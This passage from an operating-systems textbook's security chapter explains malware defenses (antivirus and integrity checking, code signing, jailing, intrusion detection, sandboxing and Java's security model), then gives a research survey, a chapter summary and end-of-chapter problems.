ecutable files.  In addition, the antivirus scanner has to check the MBR, boot sec-
tors, bad-sector list, flash memory, CMOS memory, and more, but what if there is a
memory-resident virus currently running?         That will not be detected. Worse yet,
suppose the running virus is monitoring all system calls.         It can easily detect that
the antivirus program is reading the boot sector (to check for viruses).       To thwart
the antivirus program, the virus does not make the system call. Instead it just re-
turns the true boot sector from its hiding place in the bad-block list.      It also makes
a mental note to reinfect all the files when the virus scanner is finished.
     To prevent being spoofed by a virus, the antivirus program could make hard
reads to the disk, bypassing the operating system. However, this requires having



SEC. 9.10                         DEFENSES                                               691
built-in device drivers for SATA, USB, SCSI, and other common disks, making the
antivirus program less portable and subject to failure on computers with unusual
disks. Furthermore, since bypassing the operating system to read the boot sector is
possible, but bypassing it to read all the executable files is not, there is also some
danger that the virus can produce fraudulent data about executable files.
Integrity Checkers
       A completely different approach to virus detection is integrity checking.          An
antivirus program that works this way first scans the hard disk for viruses. Once it
is convinced that the disk is clean, it computes a checksum for each executable file.
The checksum algorithm could be something as simple as treating all the words in
the program text as 32- or 64-bit integers and adding them up, but it also can be a
cryptographic hash that is nearly impossible to invert.  It then writes the list of
checksums for all the relevant files in a directory to a file, checksum, in that direc-
tory. The next time it runs, it recomputes all the checksums and sees if they match
what is in the file checksum. An infected file will show up immediately.
       The trouble is that Virgil is not going to take this lying down.    He can write a
virus that removes the checksum file.  Worse yet, he can write a virus that com-
putes the checksum of the infected file and replaces the old entry in the checksum
file.  To protect against this kind of behavior, the antivirus program can try to hide
the checksum file, but that is not likely to work since Virgil can study the antivirus
program carefully before writing the virus.  A better idea is to sign it digitally to
make tampering easy to detect.    Ideally, the digital signature should involve use of
a smart card with an externally stored key that programs cannot get at.
Behavioral Checkers
       A third strategy used by antivirus software is behavioral checking.  With this
approach, the antivirus program lives in memory while the computer is running
and catches all system calls itself. The idea is that it can then monitor all activity
and try to catch anything that looks suspicious. For example, no normal program
should attempt to overwrite the boot sector, so an attempt to do so is almost cer-
tainly due to a virus. Likewise, changing the flash memory is highly suspicious.
       But there are also cases that are less clear cut. For example, overwriting an ex-
ecutable file is a peculiar thing to do--unless you are a compiler.        If the antivirus
software detects such a write and issues a warning, hopefully the user knows
whether overwriting an executable makes sense in the context of the current work.
Similarly, Word overwriting a .docx file with a new document full of macros is not
necessarily the work of a virus.  In Windows, programs can detach from their ex-
ecutable file and go memory resident using a special system call. Again, this might
be legitimate, but a warning might still be useful.



692                                    SECURITY                                 CHAP. 9
     Viruses do not have to passively lie around waiting for an antivirus program to
kill them, like cattle being led off to slaughter. They can fight back. A particularly
exciting  battle   can   occur  if  a  memory-resident  virus  and  a  memory-resident
antivirus meet up on the same computer. Years ago there was a game called Core
Wars in which two programmers faced off by each dropping a program into an
empty address space. The programs took turns probing memory, with the object of
the game being to locate and wipe out your opponent before he wiped you out. The
virus-antivirus confrontation looks a little like that, only the battlefield is the ma-
chine of some poor user who does not really want it to happen there. Worse yet, the
virus has an advantage because its writer can find out a lot about the antivirus pro-
gram by just buying a copy of it.      Of course, once the virus is out there, the
antivirus team can modify their program, forcing Virgil to go buy a new copy.
Virus Avoidance
     Every good story needs a moral. The moral of this one is
     Better safe than sorry.
Avoiding viruses in the first place is a lot easier than trying to track them down
once they have infected a computer. Below are a few guidelines for individual
users, but also some things that the industry as a whole can do to reduce the prob-
lem considerably.
     What can users do to avoid a virus infection?      First, choose an operating sys-
tem that offers a high degree of security, with a strong kernel-user mode boundary
and separate login passwords for each user and the system administrator. Under
these conditions, a virus that somehow sneaks in cannot infect the system binaries.
Also, make sure to install manufacturer security patches promptly.
     Second, install only shrink-wrapped or downloaded software bought from a re-
liable manufacturer. Even this is no guarantee since there have been cases where
disgruntled employees have slipped viruses onto a commercial software product,
but  it  helps  a  lot.  Downloading   software  from   amateur  Websites  and  bulletin
boards offering too-good-to-be-true deals is risky behavior.
     Third, buy a good antivirus software package and use it as directed.  Be sure to
get regular updates from the manufacturer's Website.
     Fourth, do not click on URLs in messages, or attachments to email and tell
people not to send them to you. Email sent as plain ASCII text is always safe but
attachments can start viruses when opened.
     Fifth, make frequent backups of key files onto an external medium such as
USB drives or DVDs. Keep several generations of each file on a series of backup
media.    That way, if you discover a virus, you may have a chance to restore files as
they were before they were infected. Restoring yesterday's infected file does not
help, but restoring last week's version might.



SEC. 9.10                          DEFENSES                                             693
Finally, sixth, resist the temptation to download and run glitzy new free soft-
ware from an unknown source.       Maybe there is a reason it is free--the maker
wants your computer to join his zombie army.      If you have virtual machine soft-
ware, running unknown software inside a virtual machine is safe, though.
The industry should also take the virus threat seriously and change some dan-
gerous practices. First, make simple operating systems.        The more bells and whis-
tles there are, the more security holes there are. That is a fact of life.
Second, forget active content. Turn off Javascript. From a security point of
view, it is a disaster.  Viewing a document someone sends you should not require
your running their program. JPEG files, for example, do not contain programs, and
thus cannot contain viruses. All documents should work like that.
Third, there should be a way to selectively write protect specified disk cylin-
ders to prevent viruses from infecting the programs on them. This protection could
be implemented by having a bitmap inside the controller listing the write-protected
cylinders. The map should only be alterable when the user has flipped a mechani-
cal toggle switch on the computer's front panel.
Fourth, keeping the BIOS in flash memory is a nice idea, but it should only be
modifiable when an external toggle switch has been flipped, something that will
happen only when the user is consciously installing a BIOS update.            Of course,
none of this will be taken seriously until a really big virus hits.         For example, one
that hits the financial world and resets all bank accounts to 0. Of course, by then it
will be too late.
9.10.3 Code Signing
A completely different approach to keeping out malware (remember: defense
in depth) is to run only unmodified software from reliable software vendors. One
issue that comes up fairly quickly is how the user can know the software came
from the vendor it is said to have come from and how the user can know it has not
been modified since leaving the factory.  This issue is especially important when
downloading software from online stores of unknown reputation or when down-
loading activeX controls from Websites.   If the activeX control came from a well-
known software company, it is unlikely to contain a Trojan horse, for example, but
how can the user be sure?
One way that is in widespread use is the digital signature, as described in
Sec. 9.5.4.   If the user runs only programs, plugins, drivers, activeX controls, and
other  kinds  of   software  that  were  written  and  signed  by    trusted  sources,  the
chances of getting into trouble are much less. The consequence of doing this, how-
ever, is that the new free, nifty, splashy game from Snarky Software is probably too
good to be true and will not pass the signature test since you do not know who is
behind it.
Code signing is based on public-key cryptography.              A software vendor gener-
ates a (public key, private key) pair, making the former key public and zealously



694                                           SECURITY                       CHAP. 9
guarding the latter. In order to sign a piece of software, the vendor first computes a
hash function of the code to get a 160-bit or 256-bit number, depending on whether
SHA-1 or SHA-256 is used.       It then signs the hash value by encrypting it with its
private key (actually, decrypting it using the notation of Fig. 9-15). This signature
accompanies the software wherever it goes.
     When the user gets the software, the hash function is applied to it and the re-
sult saved.  It then decrypts the accompanying signature using the vendor's public
key and compares what the vendor claims the hash function is with what it just
computed itself.      If they agree, the code is accepted as genuine.  Otherwise it is re-
jected as a forgery. The mathematics involved makes it exceedingly difficult for
anyone to tamper with the software in such a way that its hash function will match
the hash function obtained by decrypting the genuine signature.        It is equally dif-
ficult to generate a new false signature that matches without having the private key.
The process of signing and verifying is illustrated in Fig. 9-35.
     Software vendor                                    User
                      Signature generation                         Signature verification
     Program          H=  hash(Program)                 Program    H1 = hash(Program)
     Signature        Signature = encrypt(H)            Signature  H2 = decrypt(Signature)
                                                                   Accept Program if H1 = H2
                                Internet
                          Figure 9-35. How code signing works.
     Web pages can contain code, such as activeX controls, but also code in various
scripting languages. Often these are signed, in which case the browser automat-
ically examines the signature.  Of course, to verify it, the browser needs the soft-
ware vendor's public key, which normally accompanies the code along with a cer-
tificate signed by some CA vouching for the authenticity of the public key.                If the
browser has the CA's public key already stored, it can verify the certificate on its
own. If the certificate is signed by a CA unknown to the browser, it will pop up a
dialog box asking whether to accept the certificate or not.
9.10.4 Jailing
     An old Russian saying is: ``Trust but Verify.'' Clearly, the old Russian who said
this for the first time had software in mind. Even though a piece of software has
been signed, a good attitude is to verify that it is behaving correctly nonetheless as



SEC. 9.10                            DEFENSES                                            695
the signature merely proves where it came from, not what it does.  A technique for
doing this is called jailing and illustrated in Fig. 9-36.
                    Jailer                          Prisoner
                                                            Sys
           Kernel
                    Figure 9-36. The operation of a jail.
The newly acquired program is run as a process labeled ``prisoner'' in the fig-
ure. The ``jailer'' is a trusted (system) process that monitors the behavior of the
prisoner.  When a jailed process makes a system call, instead of the system call
being executed, control is transferred to the jailer (via a kernel trap) and the system
call number and parameters passed to it. The jailer then makes a decision about
whether the system call should be allowed. If the jailed process tries to open a net-
work connection to a remote host unknown to the jailer, for example, the call can
be refused and the prisoner killed.  If the system call is acceptable, the jailer so
informs the kernel, which then carries it out.      In this way, erroneous behavior can
be caught before it causes trouble.
Various implementations of jailing exist. One that works on almost any UNIX
system, without modifying the kernel, is described by Van 't Noordende et al.
(2007).    In a nutshell, the scheme uses the normal UNIX debugging facilities, with
the jailer being the debugger and the prisoner being the debuggee. Under these cir-
cumstances, the debugger can instruct the kernel to encapsulate the debuggee and
pass all of its system calls to it for inspection.
9.10.5 Model-Based Intrusion Detection
Yet another approach to defending a machine is to install an IDS (Intrusion
Detection System).  There are two basic kinds of IDSes, one focused on inspect-
ing incoming network packets and one focused on looking for anomalies on the
CPU.     We briefly mentioned the network IDS in the context of firewalls earlier;
now we will say a few words about a host-based IDS. Space limitations prevent us
from surveying the many kinds of host-based IDSes. Instead, we will briefly sketch
one type to give an idea of how they work.          This one is called static model-based
intrusion detection (Hua et al., 2009).     It can be implemented using the jailing
technique discussed above, among other ways.



696                                       SECURITY                               CHAP. 9
     In Fig. 9-37(a) we see a small program that opens a file called data and reads it
one character at a time until it hits a zero byte, at which time it prints the number
of nonzero bytes at the start of the file and exits.  In Fig. 9-37(b) we see a graph of
the system calls made by this program (where print calls write).
     int main(int argc *char argv[])                         open
     {
        int fd, n = 0;
        char buf[1];
                                                      read                write
        fd = open("data", 0);
        if (fd < 0) {
           printf("Bad data file\n");
           exit(1);                                   close               exit
        } else {
           while (1) {
                 read(fd, buf, 1);
                 if (buf[0] == 0) {                   write
                  close(fd);
                  printf("n = %d\n", n);
                  exit(0);
              }                                       exit
              n = n + 1;
           }
        }
     }
                        (a)                                  (b)
              Figure 9-37. (a) A program. (b) System-call graph for (a).
     What does this graph tell us?     For one thing, the first system call the program
makes, under all conditions, is always open.          The next one is either read or write,
depending on which branch of the if statement is taken.      If the second call is write,
it means the file could not be opened and the next call must be exit.            If the second
call is read, there may be an arbitrarily large number of additional calls to read and
eventually calls to close, write, and exit.  In the absence of an intruder, no other se-
quences are possible. If the program is jailed, the jailer will see all the system calls
and can easily verify that the sequence is valid.
     Now suppose someone finds a bug in this program and manages to trigger a
buffer overflow and inserts and executes hostile code. When the hostile code runs,
it will most likely execute a different sequence of system calls. For example, it
might try to open some file it wants to copy or it might open a network connection
to phone home. On the very first system call that does not fit the pattern, the jailer
knows definitively that there has been an attack and can take action, such as killing
the process and alerting the system administrator.          In this manner, intrusion detec-
tion systems can detect attacks while they are going on. Static analysis of system
calls is just one of the many ways an IDS can work.



SEC. 9.10                            DEFENSES                                            697
When this kind of static model-based intrusion detection is used, the jailer has
to know the model (i.e., the system-call graph).     The most straightforward way for
it to learn it is to have the compiler generate it and have the author of the program
sign it and attach its certificate.  In this way, any attempt to modify the executable
program in advance will be detected when it is run because the actual behavior will
not agree with the signed expected behavior.
Unfortunately, it is possible for a clever attacker to launch what is called a
mimicry attack, in which the inserted code makes the same system calls as the
program is supposed to, so more sophisticated models are needed than just tracking
system calls. Still, as part of defense in depth, an IDS can play a role.
A model-based IDS is not the only kind, by any means. Many IDSes make use
of a concept called a honeypot, a trap set to attract and catch crackers and mal-
ware. Usually it is an isolated machine with few defenses and a seemingly inter-
esting and valuable content, ripe for the picking. The people who set the honeypot
carefully monitor any attacks on it to try to learn more about the nature of the at-
tack. Some IDSes put their honeypots in virtual machines to prevent damage to the
underlying actual system.   So naturally, the malware tries to determine if it is run-
ning in a virtual machine, as discussed above.
9.10.6 Encapsulating Mobile Code
Viruses and worms are programs that get onto a computer without the owner's
knowledge and against the owner's will. Sometimes, however, people more-or-less
intentionally import and run foreign code on their machines.       It usually happens
like this.  In the distant past (which, in the Internet world, means a few years ago),
most Web pages were just static HTML files with a few associated images. Now-
adays,  increasingly  many  Web      pages  contain  small  programs       called  applets.
When a Web page containing applets is downloaded, the applets are fetched and
executed. For example, an applet might contain a form to be filled out, plus
interactive help in filling it out. When the form is filled out, it could be sent some-
where over the Internet for processing. Tax forms, customized product order forms,
and many other kinds of forms could benefit from this approach.
Another example in which programs are shipped from one machine to another
for execution on the destination machine are agents.    These are programs that are
launched by a user to perform some task and then report back. For example, an
agent could be asked to check out some travel Websites to find the cheapest flight
from Amsterdam to San Francisco. Upon arriving at each site, the agent would run
there, get the information it needs, then move on to the next Website. When it was
all done, it could come back home and report what it had learned.
A third example of mobile code is a PostScript file that is to be printed on a
PostScript printer.   A PostScript file is actually a program in the PostScript pro-
gramming language that is executed inside the printer.      It normally tells the printer



698                                  SECURITY                 CHAP. 9
to draw certain curves and then fill them in, but it can do anything else it wants to
as well. Applets, agents, and PostScript files are just three examples of mobile
code, but there are many others.
     Given the long discussion about viruses and worms earlier, it should be clear
that allowing foreign code to run on your machine is more than a wee bit risky.
Nevertheless, some people do want to run these foreign programs, so the question
arises: ``Can mobile code be run safely''?      The short answer is: ``Yes, but not easi-
ly.'' The fundamental problem is that when a process imports an applet or other
mobile code into its address space and runs it, that code is running as part of a
valid user process and has all the power the user has, including the ability to read,
write, erase, or encrypt the user's disk files, email data to far-away countries, and
much more.
     Long ago, operating systems developed the process concept to build walls be-
tween users. The idea is that each process has its own protected address space and
its own UID, allowing it to touch files and other resources belonging to it, but not
to other users. For providing protection against one part of the process (the applet)
and the rest, the process concept does not help. Threads allow multiple threads of
control within a process, but do nothing to protect one thread against another one.
     In theory, running each applet as a separate process helps a little, but is often
infeasible. For example, a Web page may contain two or more applets that interact
with each other and with the data on the Web page. The Web browser may also
need to interact with the applets, starting and stopping them, feeding them data,
and so on.  If each applet is put in its own process, the whole thing will not work.
Furthermore, putting an applet in its own address space does not make it any
harder for the applet to steal or damage data.  If anything, it is easier since nobody
is watching in there.
     Various new methods of dealing with applets (and mobile code in general)
have been proposed and implemented. Below we will look at two of these meth-
ods: sandboxing and interpretation.  In addition, code signing can also be used to
verify the source of the applet. Each one has its own strengths and weaknesses.
Sandboxing
     The first method, called sandboxing, confines each applet to a limited range of
virtual addresses enforced at run time (Wahbe et al., 1993).  It works by dividing
the virtual address space up into equal-size regions, which we will call sandboxes.
Each sandbox must have the property that all of its addresses share some string of
high-order bits. For a 32-bit address space, we could divide it up into 256 sand-
boxes on 16-MB boundaries so that all addresses within a sandbox have a common
upper 8 bits. Equally well, we could have 512 sandboxes on 8-MB boundaries,
with each sandbox having a 9-bit address prefix. The sandbox size should be cho-
sen to be large enough to hold the largest applet without wasting too much virtual
address space. Physical memory is not an issue if demand paging is present, as it



SEC. 9.10                                      DEFENSES                                699
usually is.  Each applet is given two sandboxes, one for the code and one for the
data, as illustrated in Fig. 9-38(a) for the case of 16 sandboxes of 16 MB each.
             Virual
             address
             in MB
                      256
                      224  Ref. Mon.  Reference          MOV R1, S1
                      192             monitor for        SHR #24, S1
                                      checking           CMP S1, S2
                      160             system             TRAPNE
                                                         JMP (R1)
                      128
                      96   Data 2
                           Code 2     Applet 2
                      64
                      32   Data 1
                           Code 1     Applet 1
                      0
                           (a)                           (b)
        Figure 9-38. (a) Memory divided into 16-MB sandboxes. (b) One way of
        checking an instruction for validity.
The basic idea behind a sandbox is to guarantee that an applet cannot jump to
code outside its code sandbox or reference data outside its data sandbox. The rea-
son for having two sandboxes is to prevent an applet from modifying its code dur-
ing execution to get around these restrictions.          By preventing all stores into the
code sandbox, we eliminate the danger of self-modifying code.                 As long as an
applet is confined this way, it cannot damage the browser or other applets, plant vi-
ruses in memory, or otherwise do any damage to memory.
As soon as an applet is loaded, it is relocated to begin at the start of its sand-
box. Then checks are made to see if code and data references are confined to the
appropriate sandbox.  In the discussion below, we will just look at code references
(i.e., JMP and CALL instructions), but the same story holds for data references as
well. Static JMP instructions that use direct addressing are easy to check: does the
target address land within the boundaries of the code sandbox?        Similarly, relative
JMPs are also easy to check.          If the applet has code that tries to leave the code
sandbox, it is rejected and not executed. Similarly, attempts to touch data outside
the data sandbox cause the applet to be rejected.
The hard part is dynamic JMP instructions. Most machines have an instruction
in which the address to jump to is computed at run time, put in a register, and then
jumped to indirectly, for example by JMP (R1) to jump to the address held in regis-
ter 1.  The validity of such instructions must be checked at run time. This is done
by inserting code directly before the indirect jump to test the target address.        An



700                          SECURITY                                  CHAP. 9
example of such a test is shown in Fig. 9-38(b). Remember that all valid addresses
have the same upper k bits, so this prefix can be stored in a scratch register, say S2.
Such a register cannot be used by the applet itself, which may require rewriting it
to avoid this register.
     The code works as follows: First the target address under inspection is copied
to a scratch register, S1.   Then this register is shifted right precisely the correct
number of bits to isolate the common prefix in S1. Next the isolated prefix is com-
pared to the correct prefix initially loaded into S2. If they do not match, a trap oc-
curs and the applet is killed. This code sequence requires four instructions and two
scratch registers.
     Patching the binary program during execution requires some work, but it is
doable.  It would be simpler if the applet were presented in source form and then
compiled locally using a trusted compiler that automatically checked the static ad-
dresses and inserted code to verify the dynamic ones during execution. Either way,
there is some run-time overhead associated with the dynamic checks. Wahbe et al.
(1993) have measured this as about 4%, which is generally acceptable.
     A second problem that must be solved is what happens when an applet tries to
make a system call.      The solution here is straightforward. The system-call instruc-
tion is replaced by a call to a special module called a reference monitor on the
same pass that the dynamic address checks are inserted (or, if the source code is
available, by linking with a special library that calls the reference monitor instead
of making system calls).     Either way, the reference monitor examines each at-
tempted call and decides if it is safe to perform.      If the call is deemed acceptable,
such as writing a temporary file in a designated scratch directory, the call is allow-
ed to proceed. If the call is known to be dangerous or the reference monitor cannot
tell, the applet is killed.  If the reference monitor can tell which applet called it, a
single reference monitor somewhere in memory can handle the requests from all
applets. The reference monitor normally learns about the permissions from a con-
figuration file.
Interpretation
     The second way to run untrusted applets is to run them interpretively and not
let them get actual control of the hardware. This is the approach used by Web
browsers.  Web page applets are commonly written in Java, which is a normal pro-
gramming language, or in a high-level scripting language such as safe-TCL or
Javascript. Java applets are first compiled to a virtual stack-oriented machine lan-
guage called JVM (Java Virtual Machine).            It is these JVM applets that are put
on the Web page. When they are downloaded, they are inserted into a JVM inter-
preter inside the browser as illustrated in Fig. 9-39.
     The advantage of running interpreted code over compiled code is that every in-
struction is examined by the interpreter before being executed. This gives the inter-
preter the opportunity to check if the address is valid. In addition, system calls are



SEC. 9.10                          DEFENSES                                             701
                                   Virtual address space
                       0xFFFFFFFF
                                                          Untrusted applet
                   Sandbox
                   Interpreter                            Trusted applet
                                   Web browser
                                0
                       Figure 9-39. Applets can be interpreted by a Web browser.
also caught and interpreted. How these calls are handled is a matter of the security
policy.  For example, if an applet is trusted (e.g., it came from the local disk), its
system calls could be carried out without question. However, if an applet is not
trusted (e.g., it came in over the Internet), it could be put in what is effectively a
sandbox to restrict its behavior.
High-level scripting languages can also be interpreted. Here no machine ad-
dresses are used, so there is no danger of a script trying to access memory in an
impermissible way. The downside of interpretation in general is that it is very slow
compared to running native compiled code.
9.10.7 Java Security
The Java programming language and accompanying run-time system were de-
signed to allow a program to be written and compiled once and then shipped over
the Internet in binary form and run on any machine supporting Java. Security was a
part of the Java design from the beginning.  In this section we will describe how it
works.
Java is a type-safe language, meaning that the compiler will reject any attempt
to use a variable in a way not compatible with its type.      In contrast, consider the
following C code:
naughty    func( )
{
         char *p;
         p = rand( );
         *p = 0;
}
It generates a random number and stores it in the pointer p.  Then it stores a 0 byte
at the address contained in p, overwriting whatever was there, code or data.            In



702                                  SECURITY                                      CHAP. 9
Java, constructions that mix types like this are forbidden by the grammar.         In addi-
tion, Java has no pointer variables, casts, or user-controlled storage allocation (such
as malloc and free), and all array references are checked at run time.
     Java programs are compiled to an intermediate binary code called JVM (Java
Virtual Machine) byte code.         JVM has about 100 instructions, most of which
push objects of a specific type onto the stack, pop them from the stack, or combine
two items on the stack arithmetically. These JVM programs are typically inter-
preted, although in some cases they can be compiled into machine language for
faster execution. In the Java model, applets sent over the Internet are in JVM.
     When an applet arrives, it is run through a JVM byte code verifier that checks
if the applet obeys certain rules.   A properly compiled applet will automatically
obey them, but there is nothing to prevent a malicious user from writing a JVM
applet in JVM assembly language. The checks include
       1.  Does the applet attempt to forge pointers?
       2.  Does it violate access restrictions on private-class members?
       3.  Does it try to use a variable of one type as another type?
       4.  Does it generate stack overflows or underflows?
       5.  Does it illegally convert variables of one type to another?
If the applet passes all the tests, it can be safely run without fear that it will access
memory other than its own.
     However, applets can still make system calls by calling Java methods (proce-
dures) provided for that purpose. The way Java deals with that has evolved over
time.  In the first version of Java, JDK (Java Development Kit) 1.0.          applets were
divided into two classes: trusted and untrusted. Applets fetched from the local disk
were trusted and allowed to make any system calls they wanted.            In contrast, app-
lets fetched over the Internet were untrusted.          They were run in a sandbox, as
shown in Fig. 9-39, and allowed to do practically nothing.
     After some experience with this model, Sun decided that it was too restrictive.
In JDK 1.1, code signing was employed. When an applet arrived over the Internet,
a check was made to see if it was signed by a person or organization the user trust-
ed (as defined by the user's list of trusted signers).  If so, the applet was allowed to
do whatever it wanted. If not, it was run in a sandbox and severely restricted.
     After  more  experience,  this  proved  unsatisfactory  as  well,    so  the  security
model was changed again.       JDK 1.2 introduced a configurable fine-grain security
policy that applies to all applets, both local and remote. The security model is com-
plicated enough that an entire book has been written describing it (Gong, 1999), so
we will just briefly summarize some of the highlights.
     Each applet is characterized by two things: where it came from and who signed
it. Where it came from is its URL; who signed it is which private key was used for
the signature. Each user can create a security policy consisting of a list of rules.



SEC. 9.10                               DEFENSES                                          703
Each rule may list a URL, a signer, an object, and an action that the applet may
perform on the object if the applet's URL and signer match the rule. Conceptually,
the information provided is shown in the table of Fig. 9-40, although the actual for-
matting is different and is related to the Java class hierarchy.
URL                          Signer     Object                    Action
www.taxprep.com              TaxPrep    /usr/susan/1040.xls       Read
*                                       /usr/tmp/*                Read, Write
www.microsoft.com            Microsoft  /usr/susan/Office/       Read, Write, Delete
           Figure 9-40. Some examples of protection that can be specified with JDK 1.2.
One kind of action permits file access. The action can specify a specific file or
directory, the set of all files in a given directory, or the set of all files and direc-
tories recursively contained in a given directory. The three lines of Fig. 9-40 corre-
spond to these three cases.  In the first line, the user, Susan, has set up her permis-
sions file so that applets originating at her tax preparer's machine, which is called
www.taxprep.com, and signed by the company, have read access to her tax data lo-
cated in the file 1040.xls.  This is the only file they can read and no other applets
can read this file.  In addition, all applets from all sources, whether signed or not,
can read and write files in /usr/tmp.
Furthermore, Susan also trusts Microsoft enough to allow applets originating at
its site and signed by Microsoft to read, write, and delete all the files below the
Office directory in the directory tree, for example, to fix bugs and install new ver-
sions of the software.  To verify the signatures, Susan must either have the neces-
sary public keys on her disk or must acquire them dynamically, for example in the
form of a certificate signed by a company she trusts and whose public key she has.
Files are not the only resources that can be protected. Network access can also
be protected.  The objects here are specific ports on specific computers.                A com-
puter is specified by an IP address or DNS name; ports on that machine are speci-
fied by a range of numbers. The possible actions include asking to connect to the
remote computer and accepting connections originated by the remote computer.              In
this way, an applet can be given network access, but restricted to talking only to
computers explicitly named in the permissions list. Applets may dynamically load
additional code (classes) as needed, but user-supplied class loaders can precisely
control on which machines such classes may originate. Numerous other security
features are also present.
9.11 RESEARCH ON SECURITY
Computer security is an extremely hot topic. Research is taking place in all
areas: cryptography, attacks, malware, defenses, compilers, etc. A more-or-less
continuous stream of high-profile security incidents ensures that research interest



704                                SECURITY                                CHAP. 9
in security, both in academia and in industry, is not likely to waver in the next few
years either.
     One important topic is the protection of binary programs. Control Flow Integ-
rity (CFI) is a fairly old technique to stop all control flow diversions and, hence, all
ROP exploits. Unfortunately, the overhead is very high. Since ASLR, DEP, and
canaries are not cutting it, much recent work is devoted to making CFI practical.
For instance, Zhang and Sekar (2013) at Stony Brook developed an efficient imple-
mentation of CFI for Linux binaries. A different group devised a different and even
more powerful implementation for Windows (Zhang, 2013b). Other research has
tried to detect buffer overflows even earlier, at the moment of the overflow rather
than at the attempted control flow diversion (Slowinska et al., 2012). Detecting the
overflow itself has one major advantage. Unlike most other approaches, it allows
the system to detect attacks that modify noncontrol data also. Other tools provide
similar  protection  at   compile  time.  A  popular  example          is  Google's       Ad-
dressSanitizer (Serebryany, 2013). If any of these techniques becomes widely de-
ployed, we will have to add another paragraph to the arms race described in the
buffer overflow section.
     One of the hot topics in cryptography these days is homomorphic encryption.
In laymen's terms: homomorphic encryption allows one to process (add, subtract,
etc.) encrypted data while they are encrypted. In other words, the data are never
converted to plaintext. A study into the limits of provable security for homomor-
phic encryption was conducted by Bogdanov and Lee (2013).
     Capabilities and access control are also still very active research areas. A good
example of a microkernel supporting capabilities is the seL4 kernel (Klein et al.,
2009). Incidentally, this is also a fully verified kernel which provides additional se-
curity. Capabilities have now become hot in UNIX also. Robert Watson et al.
(2013) have implemented lightweight capabilities to FreeBSD.
     Finally, there is large body of work on exploitation techniques and malware.
For instance, Hund et al. (2013) show a practical timing channel attack to defeat
address-space randomization in the Windows kernel. Likewise Snow et al. (2013)
show that JavaScript address space randomization in the browser does not help as
long as the attacker finds a memory disclosure that leaks even a single gadget.
Regarding malware, a recent study by Rossow et al. (2013) analyzes an alarming
trend in the resilience of botnets. It seems that especially botnets based on peer-to-
peer communication will be exceedingly hard to dismantle in the near future. Some
of these botnets have been operational, nonstop, for over five years.
9.12 SUMMARY
     Computers frequently contain valuable and confidential data, including tax re-
turns, credit card numbers, business plans, trade secrets, and much more. The own-
ers of these computers are usually quite keen on having them remain private and



SEC. 9.12                      SUMMARY                                                   705
not tampered with, which rapidly leads to the requirement that operating systems
must provide good security. In general, the security of a system is inversely propor-
tional to the size of the trusted computing base.
      A fundamental component of security for operating systems concerns access
control to resources. Access rights to information can be modeled as a big matrix,
with the rows being the domains (users) and the columns being the objects (e.g.,
files). Each cell specifies the access rights of the domain to the object. Since the
matrix is sparse, it can be stored by row, which becomes a capability list saying
what that domain can do, or by column, in which case it becomes an access control
list telling who can access the object and how. Using formal modeling techniques,
information flow in a system can be modeled and limited. However, sometimes it
can still leak out using covert channels, such as modulating CPU usage.
      One way to keep information secret is to encrypt it and manage the keys care-
fully.  Cryptographic schemes can be categorized as secret key or public key. A
secret-key method requires the communicating parties to exchange a secret key in
advance, using some out-of-band mechanism. Public-key cryptography does not
require secretly exchanging a key in advance, but it is much slower in use.  Some-
times it is necessary to prove the authenticity of digital information, in which case
cryptographic hashes, digital signatures, and certificates signed by a trusted certifi-
cation authority can be used.
      In any secure system users must be authenticated. This can be done by some-
thing the user knows, something the user has, or something the user is (biometrics).
Two-factor identification, such as an iris scan and a password, can be used to
enhance security.
      Many kinds of bugs in the code can be exploited to take over programs and
systems. These include buffer overflows, format string attacks, dangling pointer at-
tacks, return to libc attacks, null pointer dereference attacks, integer overflow at-
tacks, command injection attacks, and TOCTOUs. Likewise, there are many count-
er measures that try to prevent such exploits. Examples include stack canaries, data
execution prevention, and address-space layout randomization.
      Insiders, such as company employees, can defeat system security in a variety
of ways. These include logic bombs set to go off on some future date, trap doors to
allow the insider unauthorized access later, and login spoofing.
      The Internet is full of malware, including Trojan horses, viruses, worms, spy-
ware, and rootkits. Each of these poses a threat to data confidentiality and integrity.
Worse yet, a malware attack may be able to take over a machine and turn it into a
zombie which sends spam or is used to launch other attacks.       Many of the attacks
all over the Internet are done by zombie armies under control of a remote botmas-
ter.
      Fortunately, there are a number of ways systems can defend themselves. The
best strategy is defense in depth, using multiple techniques.     Some of these include
firewalls, virus scanners, code signing, jailing, and intrusion detection systems, and
encapsulating mobile code.



706                                     SECURITY                                       CHAP. 9
                                        PROBLEMS
1.   Confidentiality, integrity, and availability are three components of security.    Describe
     an application that integrity and availability but not confidentiality, an application that
     requires confidentiality and integrity but not (high) availability, and an application that
     requires confidentiality, integrity, and availability
2.   One of the techniques to build a secure operating system is to minimize the size of
     TCB.  Which of the following functions needs to be implemented inside the TCB and
     which can be implemented outside TCB: (a) Process context switch; (b) Read a file
     from disk; (c) Add more swapping space; (d) Listen to music; (e) Get the GPS coordi-
     nates of a smartphone.
3.   What is a covert channel? What is the basic requirement for a covert channel to exist?
4.   In a full access-control matrix, the rows are for domains and the columns are for ob-
     jects. What happens if some object is needed in two domains?
5.   Suppose that a system has 5000 objects and 100 domains at some time. 1% of the ob-
     jects are accessible (some combination of r, w and x) in all domains, 10% are ac-
     cessible in two domains, and the remaining 89% are accessible in only one domain.
     Suppose one unit of space is required to store an access right (some combination of r,
     w, x), object ID, or a domain ID.  How much space is needed to store the full protec-
     tion matrix, protection matrix as ACL, and protection matrix as capability list?
6.   Explain which implementation of the protection matrix is more suitable for the follow-
     ing operations:
     (a) Granting read access to a file for all users.
     (b) Revoking write access to a file from all users.
     (c) Granting write access to a file to John, Lisa, Christie, and Jeff.
     (d) Revoking execute access to a file from Jana, Mike, Molly, and Shane.
7.   Two different protection mechanisms that we have discussed are capabilities and ac-
     cess-control lists. For each of the following protection problems, tell which of these
     mechanisms can be used.
     (a) Ken wants his files readable by everyone except his office mate.
     (b) Mitch and Steve want to share some secret files.
     (c) Linda wants some of her files to be public.
8.   Represent the ownerships and permissions shown in this UNIX directory listing as a
     protection matrix.   (Note: asw is a member of two groups: users and devel; gmw is a
     member only of users.)     Treat each of the two users and two groups as a domain, so
     that the matrix has four rows (one per domain) and four columns (one per file).
      rw r  r          2  gmw     users               908  May 26 16:45  PPP Notes
      rwx r x r x         1  asw     devel               432  May 13 12:35  prog1
      rw rw            1  asw     users           50094    May 30 17:51  project.t
      rw r            1  asw     devel           13124    May 31 14:30  splash.gif
9.   Express the permissions shown in the directory listing of the previous problem as ac-
     cess-control lists.



CHAP. 9                             PROBLEMS                                           707
10.  Modify the ACL from the previous problem for one file to grant or deny an access that
